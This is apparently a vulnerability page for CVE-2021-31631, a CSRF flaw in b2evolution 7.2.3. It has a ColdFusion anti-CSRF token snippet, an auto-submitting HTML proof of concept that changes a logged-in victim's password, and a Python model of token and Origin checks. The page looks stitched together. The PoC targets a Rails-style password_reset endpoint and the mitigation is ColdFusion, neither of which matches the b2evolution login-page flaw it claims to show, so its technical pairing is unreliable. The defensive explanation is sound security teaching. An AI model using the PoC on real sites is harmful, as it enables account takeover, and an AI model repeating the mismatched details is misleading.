CVE-2021-31631: CSRF
b2evolution CMS v7.2.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the User login page. This vulnerability allows attackers to escalate privileges.
Cross-Site Request Forgery (CSRF) in b2evolution version 7.2.3 is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. It works because web browsers automatically include most ambient credentials with each request, such as session cookies, HTTP Basic Authentication headers and client-side TLS certificates, and the request arrives from the victim's own IP address. The server therefore cannot distinguish a forged request from one the user intended unless it demands something the attacker's page cannot supply, such as a secret token bound to the session.
The standard mitigation is a per-session anti-CSRF token that the server validates before acting on the request. In ColdFusion the built-in CSRFGenerateToken()/CSRFverifyToken() pair does this; the check runs first, and the token is rendered into the legitimate form so that only a page served by the application can submit a valid one:
<!--- Server-side check: reject any submission whose token was not issued by CSRFGenerateToken() for this session --->
<cfif NOT StructIsEmpty(form)>
    <cfif NOT structKeyExists(form, "token") OR NOT CSRFverifyToken(form.token)>
        <cfabort showerror="Invalid Token" />
    </cfif>
    <cfoutput><p>Hello, #EncodeForHTML(form.name)#</p></cfoutput>
</cfif>
<cfoutput><form method="post" action="#cgi.script_name#">
    <input type="hidden" name="token" value="#CSRFGenerateToken()#" />
    <input type="text" name="name" /><input type="submit" value="Submit" />
</form></cfoutput>
Proof-of-concept page an attacker would host. A victim who is logged in to the target and loads this page has their browser submit the form, with the victim's session cookie attached, to the target's password-change endpoint; the request carries no token the server could check:
<html>
<body>
<!-- Attacker-hosted CSRF PoC: the browser adds the victim's cookies to this cross-site POST automatically -->
<form action="https://localhost/users/59215b8f0ec7c37a4ca27b00/password_reset" method="POST">
<!-- utf8 check-mark and _method=patch replicate the legitimate form's own hidden fields -->
<input type="hidden" name="utf8" value="&#x2713;" />
<input type="hidden" name="_method" value="patch" />
<input type="hidden" name="old_password" value="phew phew" />
<input type="hidden" name="password" value="qweqji" />
<input type="hidden" name="password_confirmation" value="qweqji" />
<input type="submit" value="Submit request" />
</form>
<!-- Submit without user interaction so merely visiting the page triggers the request -->
<script>document.forms[0].submit();</script>
</body>
</html>
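To show why the cookie alone proves nothing and how a token plus Origin check stops the PoC above, here is an added, runnable model of the server-side decision (example code written for this page, not b2evolution's or any framework's own code). The request model, the in-memory session store, the cookie name `session`, the form field name `csrf_token` and the site origin `https://localhost` (taken from the PoC's target URL) are all assumptions of the example; the constructed requests mirror the PoC form and a legitimate submission.

```python
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

# Origin of the protected application; assumed from the PoC form's target above.
SITE_ORIGIN = "https://localhost"

# In-memory session store: session id -> per-session anti-CSRF token (constructed stand-in for a real store).
SESSIONS: dict[str, str] = {}


@dataclass
class Request:
    """Minimal model of an incoming HTTP request: what the browser sends on the victim's behalf."""
    method: str
    path: str
    headers: dict[str, str]
    cookies: dict[str, str]
    form: dict[str, str] = field(default_factory=dict)


def start_session() -> tuple[str, str]:
    """Issue a session id and bind a fresh random token to it; the legitimate form embeds the token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid, SESSIONS[sid]


def request_origin(req: Request) -> Optional[str]:
    """Origin header if present, else the origin part of Referer, else None."""
    origin = req.headers.get("Origin")
    if origin:
        return origin
    referer = req.headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def csrf_check(req: Request, token_field: str = "csrf_token") -> tuple[bool, str]:
    """Decide whether a state-changing request may proceed.

    Defence in depth: (1) only authenticated requests matter, (2) an Origin/Referer that is
    present must name our own site, (3) the form must carry the token bound to the caller's
    session. The cookie alone proves nothing about intent: the browser attaches it to the
    attacker's form post exactly as it does to a legitimate one.
    """
    if req.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method, no state change"
    sid = req.cookies.get("session")
    if sid is None or sid not in SESSIONS:
        return False, "no valid session cookie"
    origin = request_origin(req)
    if origin is not None and origin != SITE_ORIGIN:
        return False, f"cross-site origin {origin!r}"
    supplied = req.form.get(token_field, "")
    # Constant-time comparison so the token cannot be recovered byte by byte via timing.
    if not hmac.compare_digest(supplied.encode(), SESSIONS[sid].encode()):
        return False, "missing or wrong anti-CSRF token"
    return True, "ok"


def scenarios() -> dict[str, bool]:
    """Run the check over constructed requests, including one shaped like the PoC form above."""
    sid, token = start_session()
    cookies = {"session": sid}  # the victim's logged-in session, sent automatically by the browser
    path = "/users/59215b8f0ec7c37a4ca27b00/password_reset"
    cases = {
        # The site's own form: same origin, token rendered into the page.
        "legitimate": Request("POST", path, {"Origin": SITE_ORIGIN}, cookies,
                              {"csrf_token": token, "password": "new-pass"}),
        # The PoC: the victim's cookie rides along, but Origin is the attacker's page and no token is known.
        "poc_form": Request("POST", path, {"Origin": "https://attacker.example",
                                           "Referer": "https://attacker.example/poc.html"}, cookies,
                            {"_method": "patch", "password": "qweqji", "password_confirmation": "qweqji"}),
        # Same attack arriving with neither Origin nor Referer (e.g. stripped by a proxy): the token still blocks it.
        "poc_no_origin": Request("POST", path, {}, cookies, {"password": "qweqji"}),
        # Attacker guesses a token: fails because it is random per session and never leaves the victim's page.
        "poc_wrong_token": Request("POST", path, {"Origin": SITE_ORIGIN}, cookies,
                                   {"csrf_token": "A" * 43, "password": "qweqji"}),
        # No session at all: nothing to act on.
        "unauthenticated": Request("POST", path, {"Origin": SITE_ORIGIN}, {}, {"csrf_token": token}),
        # Read-only request: not a CSRF target in this model.
        "read_only": Request("GET", path, {}, cookies),
    }
    return {name: csrf_check(req)[0] for name, req in cases.items()}


if __name__ == "__main__":
    for name, allowed in scenarios().items():
        print(f"{name:16} {'allowed' if allowed else 'blocked'}")
```

Only the legitimate submission and the read-only request pass; every variant of the forged request is blocked, whether or not the attacker can suppress the Origin and Referer headers, because the token never reaches a page under the attacker's control. Marking the session cookie `SameSite=Lax` or `Strict` adds a browser-side layer, but the server-side token check is the control that does not depend on client behaviour.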